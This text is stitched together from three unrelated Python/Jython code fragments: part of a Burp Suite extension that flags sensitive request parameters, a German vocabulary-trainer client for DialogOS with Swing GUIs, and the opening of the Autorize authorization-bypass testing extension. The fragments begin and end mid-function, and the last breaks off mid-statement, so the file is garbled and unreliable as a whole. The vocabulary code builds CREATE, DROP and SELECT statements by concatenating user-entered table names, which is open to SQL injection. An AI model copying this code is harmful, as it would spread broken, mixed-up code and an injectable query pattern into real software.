self._helpers.analyzeRequest(messageInfo).getUrl() reqMethod = self._helpers.analyzeRequest(messageInfo).getMethod() reqParams = analyzeReq.getParameters() for param in reqParams: paramType = param.getType() if paramType == 0: #self.outputTxtArea.append("\nurlParams-") paramName = param.getName() paramValue = param.getValue() print 'urlParams:' print paramName + ':' + paramValue #self.outputTxtArea.append("[%s]" % paramName) self.requestParamDict['urlParams'].append( paramName.strip()) if paramType == 1: #self.outputTxtArea.append("\nBodyParams-") paramName = param.getName() paramValue = param.getValue() print 'BodyParams:' print paramName + ':' + paramValue #self.outputTxtArea.append("[%s]\n" % paramName) self.requestParamDict['BodyParams'].append( paramName.strip()) if paramType == 2: #self.outputTxtArea.append("\ncookieParams-") paramName = param.getName() paramValue = param.getValue() print 'CookieParams:' print paramName + ':' + paramValue #self.outputTxtArea.append("[%s]\n" % paramName) self.requestParamDict['cookieParams'].append( paramName.strip()) cookieParamFlag = 1 if paramType == 6: #self.outputTxtArea.append("\njsonParams-") paramName = param.getName() paramValue = param.getValue() print 'JsonParams:' print paramName + ':' + paramValue #self.outputTxtArea.append("[%s]\n" % paramName) self.requestParamDict['jsonParams'].append( paramName.strip()) self.resultSensitiveParamsDict = self.findSensitiveParam( self.requestParamDict) #print self.resultSensitiveParamsDict for rspdKey in self.resultSensitiveParamsDict.keys(): if self.resultSensitiveParamsDict[rspdKey] != []: print "[%s][%s]" % (reqMethod, reqUrl) self.outputTxtArea.append( "\n------------------------------------------------------\n" ) self.outputTxtArea.append("[%s][%s]\n" % (reqMethod, reqUrl)) break for rspdKey in self.resultSensitiveParamsDict.keys(): if self.resultSensitiveParamsDict[rspdKey] != []: self.outputTxtArea.append( "\n" + rspdKey + "--" + str(self.resultSensitiveParamsDict[rspdKey])) self.write2file() #pass else: return def findSensitiveParam(self, requestParamDict): #sensitiveParamR = getParamRegular() resultSensitiveParamsDict = {} resultSensitiveParamsDict['urlParams'] = [] resultSensitiveParamsDict['BodyParams'] = [] resultSensitiveParamsDict['cookieParams'] = [] resultSensitiveParamsDict['jsonParams'] = [] #print requestParamDict for spr in self.sensitiveParamR: for key in requestParamDict.keys(): for reqParam in requestParamDict[key]: if len(spr) == 1: if spr == reqParam.lower(): resultSensitiveParamsDict[key].append(reqParam) else: if spr in reqParam.lower(): print spr + ' in ' + reqParam resultSensitiveParamsDict[key].append(reqParam) #print resultSensitiveParamsDict for key in resultSensitiveParamsDict.keys(): resultSensitiveParamsDict[key] = {}.fromkeys( resultSensitiveParamsDict[key]).keys() #resultSensitiveParamsDict[key] = sorted(resultSensitiveParamsDict[key],key=resultSensitiveParamsDict[key].index) #print resultSensitiveParamsDict return resultSensitiveParamsDict def write2file(self): sensitiveParamsList = getSensitiveParamsFromFile() newSensitiveParamsList = [] #print self.resultSensitiveParamsDict for rspdKey in self.resultSensitiveParamsDict.keys(): if (self.resultSensitiveParamsDict[rspdKey] != []) and (set( self.resultSensitiveParamsDict[rspdKey]).issubset( set(sensitiveParamsList)) == False): newSensitiveParamsList.extend([ newSensitiveParam for newSensitiveParam in self.resultSensitiveParamsDict[rspdKey] if newSensitiveParam not in sensitiveParamsList ]) #print str(newSensitiveParamsList) if newSensitiveParamsList != []: newSensitiveParamsList = {}.fromkeys(newSensitiveParamsList).keys() with open('sensitive-params.txt', 'a') as sps: for nsp in newSensitiveParamsList: #print 'writeNewParams:'+nsp sps.write('\n' + nsp) def addAndSaveNewParamRegular(self, event): NewParamRegular = self.addAndSaveNewParamRegularTextField.getText() if NewParamRegular not in self.sensitiveParamR: self.sensitiveParamR.append(NewParamRegular) with open(paramRegularFile, 'a') as prf: prf.write('\n' + NewParamRegular) self.alertSaveSuccess.showMessageDialog(self.spePanel, "Add and save success!") else: self.alertSaveSuccess.showMessageDialog(self.tab, "paramRegular existed.") self.sensitiveParamsRegularListPanel.setListData(self.sensitiveParamR) self.sensitiveParamsRegularListPanel.revalidate() #self.sensitiveParamR = getParamRegular() def delParamRegular(self, event): #delParamRegularsIndex = self.sensitiveParamsRegularListPanel.selectedIndex #if delParamRegularsIndex >= 0: # print delParamRegularsIndex # print self.sensitiveParamR[delParamRegularsIndex] for sprlp in self.sensitiveParamsRegularListPanel.getSelectedValuesList( ): #print sprlp self.sensitiveParamR.remove(sprlp) #with open(paramRegularFile,'r') as prf1: # lines = prf1.readlines() with open(paramRegularFile, 'w') as prf2: #print self.sensitiveParamsRegularListPanel.getSelectedValuesList() #for line in lines: # if line.strip() in self.sensitiveParamsRegularListPanel.getSelectedValuesList(): # print 'remove:'+line # lines.remove(line) #for spr1 in lines: # #print spr1 # prf2.write(spr1) for spr2i, spr2 in enumerate(self.sensitiveParamR): print spr2i print spr2 if spr2i == len(self.sensitiveParamR) - 1: prf2.write(spr2) else: prf2.write(spr2 + '\n') self.sensitiveParamsRegularListPanel.setListData(self.sensitiveParamR) self.sensitiveParamsRegularListPanel.revalidate() #self.sensitiveParamR = getParamRegular() def clearRst(self, event): self.outputTxtArea.setText("") def exportRst(self, event): chooseFile = JFileChooser() ret = chooseFile.showDialog(self.logPane, "Choose file") filename = chooseFile.getSelectedFile().getCanonicalPath() print "\n" + "Export to : " + filename open(filename, 'w', 0).write(self.outputTxtArea.text) def getUiComponent(self): self.spePanel = JPanel() self.spePanel.setBorder(None) self.spePanel.setLayout(None) self.logPane = JScrollPane() self.outputTxtArea = JTextArea() self.outputTxtArea.setFont(Font("Consolas", Font.PLAIN, 12)) self.outputTxtArea.setLineWrap(True) self.logPane.setViewportView(self.outputTxtArea) self.spePanel.add(self.logPane) self.clearBtn = JButton("Clear", actionPerformed=self.clearRst) self.exportBtn = JButton("Export", actionPerformed=self.exportRst) self.parentFrm = JFileChooser() self.spePanel.add(self.clearBtn) self.spePanel.add(self.exportBtn) self.logPane.setBounds(20, 50, 800, 600) self.clearBtn.setBounds(20, 650, 100, 30) self.exportBtn.setBounds(600, 650, 100, 30) self.sensitiveParamsRegularListPanel = JList(self.sensitiveParamR) self.sensitiveParamsRegularListPanel.setVisibleRowCount( len(self.sensitiveParamR)) #self.spePanel.add(self.sensitiveParamsRegularListPanel) #self.sensitiveParamsRegularListPanel.setBounds(850,50,150,600) self.sensitiveParamsRegularListScrollPanel = JScrollPane() self.sensitiveParamsRegularListScrollPanel.setViewportView( self.sensitiveParamsRegularListPanel) self.spePanel.add(self.sensitiveParamsRegularListScrollPanel) self.sensitiveParamsRegularListScrollPanel.setBounds(850, 50, 150, 600) self.addAndSaveNewParamRegularButton = JButton( 'add&&save', actionPerformed=self.addAndSaveNewParamRegular) self.spePanel.add(self.addAndSaveNewParamRegularButton) self.addAndSaveNewParamRegularButton.setBounds(1000, 50, 150, 30) self.addAndSaveNewParamRegularTextField = JTextField('NewParamRegular') self.spePanel.add(self.addAndSaveNewParamRegularTextField) self.addAndSaveNewParamRegularTextField.setBounds(1150, 50, 100, 30) self.alertSaveSuccess = JOptionPane() self.spePanel.add(self.alertSaveSuccess) self.delParamRegularButton = JButton( "delete", actionPerformed=self.delParamRegular) self.spePanel.add(self.delParamRegularButton) self.delParamRegularButton.setBounds(1000, 90, 100, 30) return self.spePanel
def output(self, value): eingabe = value.getString() if eingabe == "Lexikon": # Falls "Lexikon" an den Clienten übergeben wird, wird die GUI geöffnet, # in der man deutsche Wörter eingeben kann, die einem dann auf Englisch # vorgelesen werden. def change_text(event): text = feld.getText() x = suche(text) self.send(x) frame.visible = False frame = JFrame( 'Woerterbuch', defaultCloseOperation=JFrame.EXIT_ON_CLOSE, size=(380, 350), ) frame.setLayout(None) frame.visible = True hintergrund = ImageIcon("Hintergrund.jpg") hintergrundlabel = JLabel(hintergrund) frame.setContentPane(hintergrundlabel) uebersetzerlabel = JLabel() uebersetzerlabel.setForeground(Color(025, 025, 112)) uebersetzerlabel.setText( "<html><font size=+1>Welches Wort soll ich uebersetzen?</font></html>" ) uebersetzerlabel.setBounds(10, 20, 500, 50) frame.add(uebersetzerlabel) feld = JTextField() feld.setText("") feld.setBounds(20, 80, 300, 25) frame.add(feld) button = JButton('Uebersetzen', actionPerformed=change_text, size=(10, 20)) button.setBounds(20, 110, 300, 30) frame.add(button) if eingabe == "neue Lektion": # Falls dem Clienten "neue Lektion" übergeben wird, öffnet er er die # GUI für das Verwalten der Lektionen frame = JFrame('Lektion erstellen', defaultCloseOperation=JFrame.EXIT_ON_CLOSE, size=(1000, 1000)) frame.setLayout(None) def auflisten_in(ort): font = Font("Verdana", Font.BOLD, 15) liste_mit_Lektionen = [] with open(pfad, "r") as f: for line in f: liste_mit_Lektionen.append(line.strip()) liste_mit_Lektionen.sort() text = "" for lektion in liste_mit_Lektionen: text += lektion text += "\n" ort.setText(text) ort.setFont(font) frame.setLayout(None) uebersichtLabel = JLabel() def uebersetzen(event): frage = feld_frage.getText() x = suche(frage) feld_frage.setText(x) liste = [] with open(pfad, "r") as lektionen: for lektion in lektionen: if "nachgeschlagen" in lektion: liste.append(lektion) if liste: name = liste[-1] words = [] sql = "SELECT deutsch, englisch, symbol FROM " + name zeile = stmt.executeQuery(sql) while zeile.next(): d = zeile.getString("deutsch") e = zeile.getString("englisch") symb = zeile.getString("symbol") words.append((d, e, symb)) if len(words) < 50: sql = "INSERT INTO " + name + " (deutsch, englisch, symbol) VALUES(?,?,?);" pstmt = conn.prepareStatement(sql) pstmt.setString(1, frage) pstmt.setString(2, x) pstmt.setString(3, "X") pstmt.executeUpdate() else: namensteile = name.split("_") nummer = int(namensteile[1].strip()) + 1 name = "nachgeschlagen_" + str(nummer) test = "" with open(pfad, "r") as f: for line in f: test += line if not name in test: with open(pfad, "a") as f: f.write(name + "\n") sql = "CREATE TABLE " + name + " (deutsch text, englisch text, symbol text);" stmt.execute(sql) sql = "INSERT INTO " + name + " (deutsch, englisch, symbol) VALUES(?,?,?);" pstmt = conn.prepareStatement(sql) pstmt.setString(1, frage) pstmt.setString(2, x) pstmt.setString(3, "X") pstmt.executeUpdate() else: name = "nachgeschlagen_1" test = "" with open(pfad, "r") as f: for line in f: test += line if not name in test: with open(pfad, "a") as f: f.write(name + "\n") sql = "CREATE TABLE " + name + " (deutsch text, englisch text, symbol text);" stmt.execute(sql) sql = "INSERT INTO " + name + " (deutsch, englisch, symbol) VALUES(?,?,?);" pstmt = conn.prepareStatement(sql) pstmt.setString(1, frage) pstmt.setString(2, x) pstmt.setString(3, "X") pstmt.executeUpdate() auflisten_in(uebersicht) def delete(event): name = feld.getText() print name print self.geladen if name == self.geladen: count = 0 while tabelle.getValueAt(count, 0) != None: tabelle.setValueAt(None, count, 0) tabelle.setValueAt(None, count, 1) count += 1 stmt.execute("DROP TABLE " + name + ";") lektionen = [] with open(pfad, "r") as f: for line in f: lektion = line.strip() if not name == lektion: lektionen.append(lektion) with open(pfad, "w") as f: for lektion in lektionen: f.write(lektion + "\n") auflisten_in(uebersicht) def laden(event): name = feld.getText() self.geladen = name sql = "SELECT deutsch, englisch FROM " + name results = stmt.executeQuery(sql) count = 0 while results.next(): d = results.getString("deutsch") e = results.getString("englisch") tabelle.setValueAt(d, count, 0) tabelle.setValueAt(e, count, 1) count += 1 while tabelle.getValueAt(count, 0) != None: tabelle.setValueAt(None, count, 0) tabelle.setValueAt(None, count, 1) count += 1 def erstelle_Lektionstabelle(event): reihen = [] for i in range(0, 50): deutsch = tabelle.getValueAt(i, 0) englisch = tabelle.getValueAt(i, 1) if deutsch != None: symbol = "X" reihen.append([deutsch, englisch, symbol]) else: break z = 0 name = feld.getText() sql = "CREATE TABLE " + name + " (deutsch text, englisch text, symbol text);" try: stmt.execute(sql) except SQLError: stmt.execute("DROP TABLE " + name + ";") stmt.execute(sql) for reihe in reihen: print(reihe) deutsch = reihe[0] englisch = reihe[1] symbol = reihe[2] sql = "INSERT INTO " + name + " (deutsch, englisch, symbol) VALUES(?,?,?);" pstmt = conn.prepareStatement(sql) pstmt.setString(1, deutsch) pstmt.setString(2, englisch) pstmt.setString(3, symbol) pstmt.executeUpdate() test = "" with open(pfad, "r") as f: for line in f: test += line if not name in test: with open(pfad, "a") as f: f.write(name + "\n") self.send(name) frame.setVisible(False) frame = JFrame('Vokabel Listen', defaultCloseOperation=JFrame.EXIT_ON_CLOSE, size=(1000, 1000)) frame.setLayout(None) label_enter = JLabel() label_enter.setText( "<html><font size=+0.5 color = 000000>Bitte vor dem Speichern<br>die Entertaste bedienen</font></html>" ) label_enter.setBounds(20, 720, 250, 50) uebersichtLabel = JLabel() uebersichtLabel.setText( "<html><font size=+1 color=#191970>Bereits vorhandene Lektionen:</font></html>" ) uebersichtLabel.setBounds(450, 230, 250, 50) uebersicht = JTextArea() uebersicht.editable = False uebersicht_scroll = JScrollPane(uebersicht) uebersicht_scroll.viewport.view = uebersicht uebersicht_scroll.setBounds(450, 300, 250, 380) auflisten_in(uebersicht) button = JButton('Lektion speichern/Lektion reseten', actionPerformed=erstelle_Lektionstabelle, size=(10, 20)) button.setBounds(20, 700, 300, 30) button_laden = JButton('vorhandene Lektion laden', actionPerformed=laden, size=(10, 20)) button_laden.setBounds(20, 110, 210, 30) button_delete = JButton("Lektion entfernen", actionPerformed=delete) button_delete.setBounds(20, 140, 210, 30) hintergrund = ImageIcon("Hintergrund.jpg") pnl = JPanel() hintergrundlabel = JLabel(hintergrund) frame.setContentPane(hintergrundlabel) lektionsnamensLabel = JLabel() lektionsnamensLabel.setForeground(Color(025, 025, 112)) lektionsnamensLabel.setText( "<html><font size=+1>Hier bitte Namen der Lektion eingeben<br>(Nur ein Wort lang)</font></html>" ) lektionsnamensLabel.setBounds(10, 20, 500, 50) frame.add(lektionsnamensLabel) feld = JTextField() feld.setText("") feld.setBounds(20, 80, 210, 25) frame.add(feld) column_names = [ "<html><font size=+1 color=#191970><b>Deutsch</b></font></html>", "<html><font size=+1 color=#191970><b>Englisch</b></font></html>" ] table_model = DefaultTableModel(column_names, 50) tabelle = JTable(table_model) lektionsnamensLabel.setForeground(Color(025, 025, 112)) scrollbar = JScrollPane(tabelle) scrollbar.viewport.view = tabelle scrollbar.setVerticalScrollBarPolicy( scrollbar.VERTICAL_SCROLLBAR_ALWAYS) scrollbar.setVisible(True) tabelle.setVisible(True) scrollbar.setBounds(20, 190, 300, 490) feld_frage = JTextField() feld_frage.setText("") feld_frage.setBounds(450, 30, 300, 50) uebersetzerlabel = JLabel() uebersetzerlabel.setForeground(Color(025, 025, 112)) uebersetzerlabel.setText( "<html><font size=+1>Hier kannst Du ein deutsches Wort eintragen,<br>dass ich fuer Dich nachschlage</font></html>" ) uebersetzerlabel.setBounds(450, 80, 500, 50) button_uebersetzen = JButton('Uebersetzen', actionPerformed=uebersetzen, size=(10, 20)) button_uebersetzen.setBounds(450, 130, 300, 30) frame.add(button_uebersetzen) frame.add(uebersetzerlabel) frame.add(feld_frage) frame.add(feld) frame.add(scrollbar) frame.add(button) frame.add(button_laden) frame.setVisible(True) frame.add(uebersicht_scroll) frame.add(uebersichtLabel) frame.add(button_delete) frame.add(label_enter) elif eingabe == "alle Lektionen auflisten": # Hier erstellt der Client eine dynamische Grammatik # mit den vorhandenen Lektionen, die man sich abfragen lassen kann # und gibt diese wieder an DialogOS zurück. # Außerdem wird der Feedback Frame geöffnet. def auflisten_in2(ort): font = Font("Verdana", Font.BOLD, 15) liste_mit_Lektionen = [] with open(pfad, "r") as f: for line in f: liste_mit_Lektionen.append(line.strip()) liste_mit_Lektionen.sort() text = "" for lektion in liste_mit_Lektionen: text += lektion text += "\n" ort.setText(text) ort.setFont(font) frame_feedback.setVisible(True) auflisten_in2(uebersicht2) grammatik = "" grammatik = "root $NamevonLektion;\n" grammatik += "$NamevonLektion = " with open(pfad, "r") as f: z = 0 for line in f: if z == 0: if not "_" in line: grammatik += line else: zeile = line.split("_") grammatik += zeile[0] + " " grammatik += zeile[1].strip() else: if not "_" in line: grammatik += "|" + line else: zeile = line.split("_") grammatik += "|" + zeile[0] + " " grammatik += zeile[1].strip() if line != "\n": z += 1 grammatik += ";" self.send(grammatik) elif "sende" in eingabe: # DialogOS sagt dem Clienten, welche Lektion der User abgefragt # werden möchte. Der Client ließt dann die entsprechende Lektion # aus der Datenbank aus und gibt eine Liste mit 2 Listen zurück. # In der ersten Liste befinden sich die deutschen Bedeutungen, der # noch nicht gewussten Wörter, in der 2. Liste die englsichen Bedeutungen. # Falls alle Wörter bereits gekonnt wurden, wird stattdessen eine entsprechende # Anmerkung an DialogOS geschickt und DialogOS informiert den User darüber. z = 0 if "nachgeschlagen" in eingabe: bestandteile = eingabe.split() name = bestandteile[1] + "_" + bestandteile[2] else: name = eingabe.split()[1] sql = "SELECT deutsch, englisch, symbol FROM " + name vokabelliste = stmt.executeQuery(sql) deutsch = [] englisch = [] symbol = [] while (vokabelliste.next()): deutsch.append(vokabelliste.getString("deutsch")) englisch.append(vokabelliste.getString("englisch")) symbol.append(vokabelliste.getString("symbol")) indices = range(0, len(deutsch)) random.shuffle(indices) vokabeln = [[], []] for index in indices: d = deutsch[index] e = englisch[index] s = symbol[index] if s == "X": vokabeln[0].append(d) vokabeln[1].append(e) if vokabeln[0]: self.send(vokabeln) else: self.send([ "Du kannst diese Lektion schon komplett. Wenn Du sie wieder abgefragt werden willst, resete sie bitte unter Wokabeln verwalten." ]) else: # Dieser Teil des Codes wird während der Abfrage ausgeführt. # Nach jeder neuen Vokabel wird dann in ein Feld im Feedback # Frame die deutsche, die englische Vokabel und ein Symbol angezeigt, # welches einen darüber informiert, ob man die Vokabel wusste, oder nicht. # (O für gewusst und X für nicht gewusst) nametext = eingabe.split(":") name = nametext[0] text = nametext[1] feld_feedback.setText(text) zeilen = text.split("\n") symb = zeilen[-2].split("\t")[-1] d = zeilen[-2].split("\t")[-3] print d sql = "UPDATE " + name + " SET symbol = ? WHERE deutsch = ?" pstmt = conn.prepareStatement(sql) pstmt.setString(1, symb) pstmt.setString(2, d) pstmt.executeUpdate()
size=(1000, 1000)) frame_feedback.setLayout(None) uebersichtLabel2 = JLabel() uebersichtLabel2.setText( "<html><font size=+1 color=#191970>vorhandene Lektionen:</font></html>") uebersichtLabel2.setBounds(450, 200, 250, 50) uebersicht2 = JTextArea() uebersicht2.editable = False uebersicht_scroll2 = JScrollPane(uebersicht2) uebersicht_scroll2.viewport.view = uebersicht2 uebersicht_scroll2.setBounds(450, 250, 250, 410) feld_feedback = JTextArea() feld_feedback.editable = False feld_feedback.setBounds(50, 50, 300, 600) button_close = JButton('close window', actionPerformed=close2) button_close.setBounds(50, 650, 300, 30) hintergrund2 = ImageIcon("Hintergrund.jpg") pnl2 = JPanel() hintergrundlabel2 = JLabel(hintergrund2) frame_feedback.setContentPane(hintergrundlabel2) frame_feedback.add(button_close) frame_feedback.add(uebersicht_scroll2) frame_feedback.add(uebersichtLabel2) frame_feedback.add(feld_feedback) frame_feedback.setVisible(False) class Main(Client): def __init__(self): pass
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory): def registerExtenderCallbacks(self, callbacks): # keep a reference to our callbacks object self._callbacks = callbacks # obtain an extension helpers object self._helpers = callbacks.getHelpers() # set our extension name callbacks.setExtensionName("Autorize") # create the log and a lock on which to synchronize when adding log entries self._log = ArrayList() self._lock = Lock() self.intercept = 0 self.initInterceptionFilters() self.initEnforcementDetector() self.initExport() self.initConfigurationTab() self.initTabs() self.initCallbacks() print "Thank you for installing Autorize v0.9 extension" print "by Barak Tawily" return def initExport(self): # ## init enforcement detector tab # exportLType = JLabel("File Type:") exportLType.setBounds(10, 10, 100, 30) exportLES = JLabel("Enforcement Statuses:") exportLES.setBounds(10, 50, 160, 30) exportFileTypes = ["HTML"] self.exportType = JComboBox(exportFileTypes) self.exportType.setBounds(100, 10, 200, 30) exportES = [ "All Statuses", "Authorization bypass!", "Authorization enforced??? (please configure enforcement detector)", "Authorization enforced!" ] self.exportES = JComboBox(exportES) self.exportES.setBounds(100, 50, 200, 30) exportLES = JLabel("Statuses:") exportLES.setBounds(10, 50, 100, 30) self.exportButton = JButton("Export", actionPerformed=self.exportToHTML) self.exportButton.setBounds(390, 25, 100, 30) self.exportPnl = JPanel() self.exportPnl.setLayout(None) self.exportPnl.setBounds(0, 0, 1000, 1000) self.exportPnl.add(exportLType) self.exportPnl.add(self.exportType) self.exportPnl.add(exportLES) self.exportPnl.add(self.exportES) self.exportPnl.add(self.exportButton) def initEnforcementDetector(self): # ## init enforcement detector tab # self.EDFP = ArrayList() self.EDCT = ArrayList() EDLType = JLabel("Type:") EDLType.setBounds(10, 10, 140, 30) EDLContent = JLabel("Content:") EDLContent.setBounds(10, 50, 140, 30) EDLabelList = JLabel("Filter List:") EDLabelList.setBounds(10, 165, 140, 30) EDStrings = [ "Finger Print: (enforced message body contains)", "Content-Length: (constant Content-Length number of enforced response)" ] self.EDType = JComboBox(EDStrings) self.EDType.setBounds(80, 10, 430, 30) self.EDText = JTextArea("", 5, 30) self.EDText.setBounds(80, 50, 300, 110) self.EDModel = DefaultListModel() self.EDList = JList(self.EDModel) self.EDList.setBounds(80, 175, 300, 110) self.EDList.setBorder(LineBorder(Color.BLACK)) self.EDAdd = JButton("Add filter", actionPerformed=self.addEDFilter) self.EDAdd.setBounds(390, 85, 120, 30) self.EDDel = JButton("Remove filter", actionPerformed=self.delEDFilter) self.EDDel.setBounds(390, 210, 120, 30) self.EDPnl = JPanel() self.EDPnl.setLayout(None) self.EDPnl.setBounds(0, 0, 1000, 1000) self.EDPnl.add(EDLType) self.EDPnl.add(self.EDType) self.EDPnl.add(EDLContent) self.EDPnl.add(self.EDText) self.EDPnl.add(self.EDAdd) self.EDPnl.add(self.EDDel) self.EDPnl.add(EDLabelList) self.EDPnl.add(self.EDList) def initInterceptionFilters(self): # ## init interception filters tab # IFStrings = [ "URL Contains: ", "Scope items only: (Content is not required)" ] self.IFType = JComboBox(IFStrings) self.IFType.setBounds(80, 10, 430, 30) self.IFModel = DefaultListModel() self.IFList = JList(self.IFModel) self.IFList.setBounds(80, 175, 300, 110) self.IFList.setBorder(LineBorder(Color.BLACK)) self.IFText = JTextArea("", 5, 30) self.IFText.setBounds(80, 50, 300, 110) IFLType = JLabel("Type:") IFLType.setBounds(10, 10, 140, 30) IFLContent = JLabel("Content:") IFLContent.setBounds(10, 50, 140, 30) IFLabelList = JLabel("Filter List:") IFLabelList.setBounds(10, 165, 140, 30) self.IFAdd = JButton("Add filter", actionPerformed=self.addIFFilter) self.IFAdd.setBounds(390, 85, 120, 30) self.IFDel = JButton("Remove filter", actionPerformed=self.delIFFilter) self.IFDel.setBounds(390, 210, 120, 30) self.filtersPnl = JPanel() self.filtersPnl.setLayout(None) self.filtersPnl.setBounds(0, 0, 1000, 1000) self.filtersPnl.add(IFLType) self.filtersPnl.add(self.IFType) self.filtersPnl.add(IFLContent) self.filtersPnl.add(self.IFText) self.filtersPnl.add(self.IFAdd) self.filtersPnl.add(self.IFDel) self.filtersPnl.add(IFLabelList) self.filtersPnl.add(self.IFList) def initConfigurationTab(self): # ## init configuration tab # self.prevent304 = JCheckBox("Prevent 304 Not Modified status code") self.prevent304.setBounds(290, 25, 300, 30) self.ignore304 = JCheckBox("Ignore 304/204 status code responses") self.ignore304.setBounds(290, 5, 300, 30) self.ignore304.setSelected(True) self.autoScroll = JCheckBox("Auto Scroll") self.autoScroll.setBounds(290, 45, 140, 30) startLabel = JLabel("Authorization checks:") startLabel.setBounds(10, 10, 140, 30) self.startButton = JButton("Autorize is off", actionPerformed=self.startOrStop) self.startButton.setBounds(160, 10, 120, 30) self.startButton.setBackground(Color(255, 100, 91, 255)) self.clearButton = JButton("Clear List", actionPerformed=self.clearList) self.clearButton.setBounds(10, 40, 100, 30) self.replaceString = JTextArea("Cookie: Insert=injected; header=here;", 5, 30) self.replaceString.setWrapStyleWord(True) self.replaceString.setLineWrap(True) self.replaceString.setBounds(10, 80, 470, 180) self.filtersTabs = JTabbedPane() self.filtersTabs.addTab("Enforcement Detector", self.EDPnl) self.filtersTabs.addTab("Interception Filters", self.filtersPnl) self.filtersTabs.addTab("Export", self.exportPnl) self.filtersTabs.setBounds(0, 280, 2000, 700) self.pnl = JPanel() self.pnl.setBounds(0, 0, 1000, 1000) self.pnl.setLayout(None) self.pnl.add(self.startButton) self.pnl.add(self.clearButton) self.pnl.add(self.replaceString) self.pnl.add(startLabel) self.pnl.add(self.autoScroll) self.pnl.add(self.ignore304) self.pnl.add(self.prevent304) self.pnl.add(self.filtersTabs) def initTabs(self): # ## init autorize tabs # self.logTable = Table(self) self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT) self._splitpane.setResizeWeight(1) self.scrollPane = JScrollPane(self.logTable) self._splitpane.setLeftComponent(self.scrollPane) self.scrollPane.getVerticalScrollBar().addAdjustmentListener( autoScrollListener(self)) copyURLitem = JMenuItem("Copy URL") copyURLitem.addActionListener(copySelectedURL(self)) self.menu = JPopupMenu("Popup") self.menu.add(copyURLitem) self.tabs = JTabbedPane() self._requestViewer = self._callbacks.createMessageEditor(self, False) self._responseViewer = self._callbacks.createMessageEditor(self, False) self._originalrequestViewer = self._callbacks.createMessageEditor( self, False) self._originalresponseViewer = self._callbacks.createMessageEditor( self, False) self.tabs.addTab("Modified Request", self._requestViewer.getComponent()) self.tabs.addTab("Modified Response", self._responseViewer.getComponent()) self.tabs.addTab("Original Request", self._originalrequestViewer.getComponent()) self.tabs.addTab("Original Response", self._originalresponseViewer.getComponent()) self.tabs.addTab("Configuration", self.pnl) self.tabs.setSelectedIndex(4) self._splitpane.setRightComponent(self.tabs) def initCallbacks(self): # ## init callbacks # # customize our UI components self._callbacks.customizeUiComponent(self._splitpane) self._callbacks.customizeUiComponent(self.logTable) self._callbacks.customizeUiComponent(self.scrollPane) self._callbacks.customizeUiComponent(self.tabs) self._callbacks.customizeUiComponent(self.filtersTabs) self._callbacks.registerContextMenuFactory(self) # add the custom tab to Burp's UI self._callbacks.addSuiteTab(self) # ## Events functions # def startOrStop(self, event): if self.startButton.getText() == "Autorize is off": self.startButton.setText("Autorize is on") self.startButton.setBackground(Color.GREEN) self.intercept = 1 self._callbacks.registerHttpListener(self) else: self.startButton.setText("Autorize is off") self.startButton.setBackground(Color(255, 100, 91, 255)) self.intercept = 0 self._callbacks.removeHttpListener(self) def addEDFilter(self, event): typeName = self.EDType.getSelectedItem().split(":")[0] self.EDModel.addElement(typeName + ": " + self.EDText.getText()) def delEDFilter(self, event): index = self.EDList.getSelectedIndex() if not index == -1: self.EDModel.remove(index) def addIFFilter(self, event): typeName = self.IFType.getSelectedItem().split(":")[0] self.IFModel.addElement(typeName + ": " + self.IFText.getText()) def delIFFilter(self, event): index = self.IFList.getSelectedIndex() if not index == -1: self.IFModel.remove(index) def clearList(self, event): self._lock.acquire() self._log = ArrayList() row = self._log.size() self.fireTableRowsInserted(row, row) self._lock.release() def exportToHTML(self, event): parentFrame = JFrame() fileChooser = JFileChooser() fileChooser.setSelectedFile(File("AutorizeReprort.html")) fileChooser.setDialogTitle("Save Autorize Report") userSelection = fileChooser.showSaveDialog(parentFrame) if userSelection == JFileChooser.APPROVE_OPTION: fileToSave = fileChooser.getSelectedFile() enforcementStatusFilter = self.exportES.getSelectedItem() htmlContent = """<html><title>Autorize Report by Barak Tawily</title> <style> .datagrid table { border-collapse: collapse; text-align: left; width: 100%; } .datagrid {font: normal 12px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #006699; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .datagrid table td, .datagrid table th { padding: 3px 10px; } .datagrid table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; color:#FFFFFF; font-size: 15px; font-weight: bold; border-left: 1px solid #0070A8; } .datagrid table thead th:first-child { border: none; }.datagrid table tbody td { color: #00496B; border-left: 1px solid #E1EEF4;font-size: 12px;font-weight: normal; }.datagrid table tbody .alt td { background: #E1EEF4; color: #00496B; }.datagrid table tbody td:first-child { border-left: none; }.datagrid table tbody tr:last-child td { border-bottom: none; }.datagrid table tfoot td div { border-top: 1px solid #006699;background: #E1EEF4;} .datagrid table tfoot td { padding: 0; font-size: 12px } .datagrid table tfoot td div{ padding: 2px; }.datagrid table tfoot td ul { margin: 0; padding:0; list-style: none; text-align: right; }.datagrid table tfoot li { display: inline; }.datagrid table tfoot li a { text-decoration: none; display: inline-block; padding: 2px 8px; margin: 1px;color: #FFFFFF;border: 1px solid #006699;-webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; }.datagrid table tfoot ul.active, .datagrid table tfoot ul a:hover { text-decoration: none;border-color: #006699; color: #FFFFFF; background: none; background-color:#00557F;}div.dhtmlx_window_active, div.dhx_modal_cover_dv { position: fixed !important; } table { width: 100%; table-layout: fixed; } td { border: 1px solid #35f; overflow: hidden; text-overflow: ellipsis; } td.a { width: 13%; white-space: nowrap; } td.b { width: 9%; word-wrap: break-word; } </style> <body> <h1>Autorize Report<h1> <div class="datagrid"><table> <thead><tr><th>URL</th><th>Authorization Enforcement Status</th></tr></thead> <tbody>""" for i in range(0, self._log.size()): color = "" if self._log.get( i )._enfocementStatus == "Authorization enforced??? (please configure enforcement detector)": color = "yellow" if self._log.get(i)._enfocementStatus == "Authorization bypass!": color = "red" if self._log.get(i)._enfocementStatus == "Authorization enforced!": color = "LawnGreen" if 